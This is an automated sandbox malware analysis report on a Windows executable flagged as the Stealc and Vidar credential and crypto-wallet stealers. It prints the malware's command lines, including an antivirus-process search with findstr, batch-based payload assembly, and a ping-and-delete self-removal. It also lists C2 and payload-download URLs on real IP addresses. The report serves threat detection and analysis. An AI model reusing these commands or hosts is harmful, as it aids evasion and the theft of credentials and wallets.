Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hlyG1m5UmO.exe

Overview

General Information

Sample name:hlyG1m5UmO.exe
renamed because original name is a hash value
Original sample name:3ec2504913e8cdf08b76861cd96317d0.exe
Analysis ID:1530592
MD5:3ec2504913e8cdf08b76861cd96317d0
SHA1:0f39916a0e4a5c71359c6fb47d871f8eda113258
SHA256:986efaa8bb0469535ddac90dbe8cd3e7cd710e9570e7ff2edda7f82b893baa79
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hlyG1m5UmO.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\hlyG1m5UmO.exe" MD5: 3EC2504913E8CDF08B76861CD96317D0)
    • cmd.exe (PID: 4768 cmdline: "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4688 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1096 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3012 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6412 cmdline: cmd /c md 464151 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4760 cmdline: findstr /V "DHappenedWestminsterUnexpected" Heat MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2380 cmdline: cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Blank.pif (PID: 5324 cmdline: Blank.pif V MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • Blank.pif (PID: 6412 cmdline: C:\Users\user\AppData\Local\Temp\464151\Blank.pif MD5: 18CE19B57F43CE0A5AF149C96AECC685)
          • 1248.tmp.exe (PID: 6020 cmdline: "C:\Users\user\AppData\Local\Temp\1248.tmp.exe" MD5: EBDE83ED138C71C69900E4BD1457B350)
            • WerFault.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 7128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 3144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 4536 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 992 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1000 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 5416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 3348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 2104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2200 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 6096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2348 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 5952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2416 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • cmd.exe (PID: 5036 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • LocalCGIDAAAKJJ.exe (PID: 2676 cmdline: "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe" MD5: C52E326B3E71B7930CF6B314D1FA1CFF)
                • cmd.exe (PID: 5776 cmdline: "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • PING.EXE (PID: 6548 cmdline: ping 2.2.2.2 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
            • WerFault.exe (PID: 1988 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2364 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • choice.exe (PID: 6300 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_cap"}

Threatname: Vidar

{"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.3346073741.0000000000400000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000010.00000002.3347378928.00000000006B3000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0xc48:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.2.1248.tmp.exe.a00e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            16.2.1248.tmp.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              16.3.1248.tmp.exe.2330000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                16.2.1248.tmp.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  16.3.1248.tmp.exe.2330000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious File Creation In Uncommon AppData Folder
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1248.tmp.exe, ProcessId: 6020, TargetFilename: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Blank.pif V, CommandLine: Blank.pif V, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\464151\Blank.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\464151\Blank.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\464151\Blank.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4768, ParentProcessName: cmd.exe, ProcessCommandLine: Blank.pif V, ProcessId: 5324, ProcessName: Blank.pif

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4768, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 3012, ProcessName: findstr.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:56.321716+020020442451Malware Command and Control Activity Detected62.204.41.17680192.168.2.549980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:56.315078+020020442441Malware Command and Control Activity Detected192.168.2.54998062.204.41.17680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:56.552328+020020442461Malware Command and Control Activity Detected192.168.2.54998062.204.41.17680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:57.190119+020020442481Malware Command and Control Activity Detected192.168.2.54998062.204.41.17680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:56.559513+020020442471Malware Command and Control Activity Detected62.204.41.17680192.168.2.549980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:56.090329+020020442431Malware Command and Control Activity Detected192.168.2.54998062.204.41.17680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:57.681346+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:01.396513+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:02.383693+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:02.904764+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:03.449961+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:05.142380+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:05.524683+020028033043Unknown Traffic192.168.2.54998062.204.41.17680TCP
                    2024-10-10T09:29:17.297106+020028033043Unknown Traffic192.168.2.549981176.113.115.3780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T09:28:40.984824+020028032742Potentially Bad Traffic192.168.2.549978104.21.56.70443TCP
                    2024-10-10T09:28:41.831870+020028032742Potentially Bad Traffic192.168.2.549979176.113.115.3780TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_cap"}
                    Source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_cap"}
                    Multi AV Scanner detection for domain / URL
                    Source: http://176.113.115.37/ScreenUpdateSync.exePVirustotal: Detection: 12%Perma Link
                    Source: http://62.204.41.176Virustotal: Detection: 14%Perma Link
                    Source: http://62.204.41.176/edd20096ecef326d.php#gVirustotal: Detection: 11%Perma Link
                    Source: http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWAREVirustotal: Detection: 12%Perma Link
                    Source: http://62.204.41.176/edd20096ecef326d.phpVirustotal: Detection: 11%Perma Link
                    Source: http://176.113.115.37/seed.exeVirustotal: Detection: 14%Perma Link
                    Source: http://176.113.115.37/ScreenUpdateSync.exe#jVirustotal: Detection: 17%Perma Link
                    Source: http://176.113.115.37/ScreenUpdateSync.exeVirustotal: Detection: 17%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\seed[1].exeReversingLabs: Detection: 55%
                    Multi AV Scanner detection for submitted file
                    Source: hlyG1m5UmO.exeVirustotal: Detection: 10%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,16_2_00409B60
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,16_2_0040C820
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,16_2_00407240
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,16_2_00409AC0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,16_2_00418EA0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C146C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,16_2_6C146C80
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C29A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,16_2_6C29A9A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C264420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,16_2_6C264420
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C294440 PK11_PrivDecrypt,16_2_6C294440
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2944C0 PK11_PubEncrypt,16_2_6C2944C0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,16_2_6C2E25B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C278670 PK11_ExportEncryptedPrivKeyInfo,16_2_6C278670
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C29A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,16_2_6C29A650
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C27E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,16_2_6C27E6E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C2BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,16_2_6C2BA730

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeUnpacked PE file: 16.2.1248.tmp.exe.400000.0.unpack
                    Source: hlyG1m5UmO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49978 version: TLS 1.2
                    Source: hlyG1m5UmO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
                    Source: Binary string: nss3.pdb@ source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
                    Source: Binary string: C:\Users\Administrator\Desktop\net8.0-windows7.0\Data\src\WalletsUpdater\WalletsUpdater\obj\Release\WalletsUpdater.pdb source: LocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.16.dr, softokn3.dll.16.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr, vcruntime140[1].dll.16.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr, msvcp140[1].dll.16.dr
                    Source: Binary string: nss3.pdb source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
                    Source: Binary string: mozglue.pdb source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.16.dr, softokn3.dll.16.dr
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_002C4005
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_002CC2FF
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_002C494A
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CCD14 FindFirstFileW,FindClose,15_2_002CCD14
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_002CCD9F
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_002CF5D8
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_002CF735
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_002CFA36
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_002C3CE2
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00439ED2 FindFirstFileExW,15_2_00439ED2
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,16_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,16_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,16_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,16_2_0040DA80
